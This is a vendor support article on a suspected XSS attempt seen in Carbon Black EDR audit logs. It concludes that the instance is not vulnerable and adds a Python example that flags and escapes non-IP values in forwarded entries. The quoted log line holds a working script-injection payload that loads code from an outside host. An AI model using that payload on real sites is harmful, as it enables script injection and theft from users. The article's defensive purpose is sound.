CB Response Cloud: Suspected XSS Vulnerability in Audit Logging

Article ID: 287884

Products

Carbon Black EDR (formerly Cb Response)

Issue/Introduction

A suspected XSS vulnerability in the audit logs suggests an attack is being made against the server
  • Audit logs forwarded to a SIEM will show an entry similar to the one below:
    Unknown 2019-10-29 21:00:03.205757+00:00 "><script src=https://kzn.xss.ht></script>, <IPADDRESS> GET /api/v1/settings/global/advanced 403 Requires Authentication

Environment

  • Carbon Black Response Cloud: All Versions

Cause

A script is being sent to the instance

Resolution

The instance is not vulnerable to the XSS exploitation attempt.

Additional Information

  • Product Security has investigated the potential vulnerability and determined that the attack will not execute on the instance and therefore does not result in XSS exploitation
  • The attempt is logged to the audit logs as expected
  • The script is treated as a string and there is no attempt to parse the IP or make use of it in any way
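
For triage on the SIEM side, the following added example (not Carbon Black code) parses forwarded audit entries, flags any whose address field holds something other than an IP literal, and HTML-escapes the flagged value so it stays a string wherever it is displayed. The field layout is an assumption inferred from the single entry shown above; the function names are hypothetical and the sample lines are constructed, with 203.0.113.10 standing in for `<IPADDRESS>`.

```python
import html
import ipaddress
import re

# Assumed layout, inferred from the one entry shown in this article:
# <user> <date> <time+tz> <address field> <METHOD> <path> <status> <message>
HEAD = re.compile(r"^(?P<user>\S+) (?P<ts>\d{4}-\d{2}-\d{2} \S+) ")
TAIL = re.compile(r" (?P<method>GET|POST|PUT|DELETE|PATCH|HEAD|OPTIONS) "
                  r"(?P<path>/\S*) (?P<status>\d{3}) (?P<msg>.*)$")

def parse_entry(line):
    """Split one entry. The address field is whatever sits between the
    timestamp and the HTTP method, so spaces inside it are tolerated."""
    head, tail = HEAD.match(line), TAIL.search(line)
    if not head or not tail or tail.start() < head.end():
        return None
    entry = {**head.groupdict(), **tail.groupdict()}
    between = line[head.end():tail.start()]
    entry["addresses"] = [part.strip() for part in between.split(",")]
    return entry

def non_ip_values(entry):
    """Return address-field values that are not IPv4/IPv6 literals."""
    bad = []
    for value in entry["addresses"]:
        try:
            ipaddress.ip_address(value)
        except ValueError:
            bad.append(value)
    return bad

def review(lines):
    """Return (entry, escaped suspicious values) for each flagged line."""
    findings = []
    for entry in filter(None, map(parse_entry, lines)):
        bad = non_ip_values(entry)
        if bad:
            # Escape before the value reaches any dashboard or ticket.
            findings.append((entry, [html.escape(v) for v in bad]))
    return findings

# Constructed sample input: the article's entry plus one benign entry.
SAMPLE = [
    'Unknown 2019-10-29 21:00:03.205757+00:00 "><script src=https://kzn.xss.ht></script>, '
    '203.0.113.10 GET /api/v1/settings/global/advanced 403 Requires Authentication',
    'Unknown 2019-10-29 21:05:11.000000+00:00 203.0.113.10 '
    'GET /api/v1/settings/global/advanced 403 Requires Authentication',
]
```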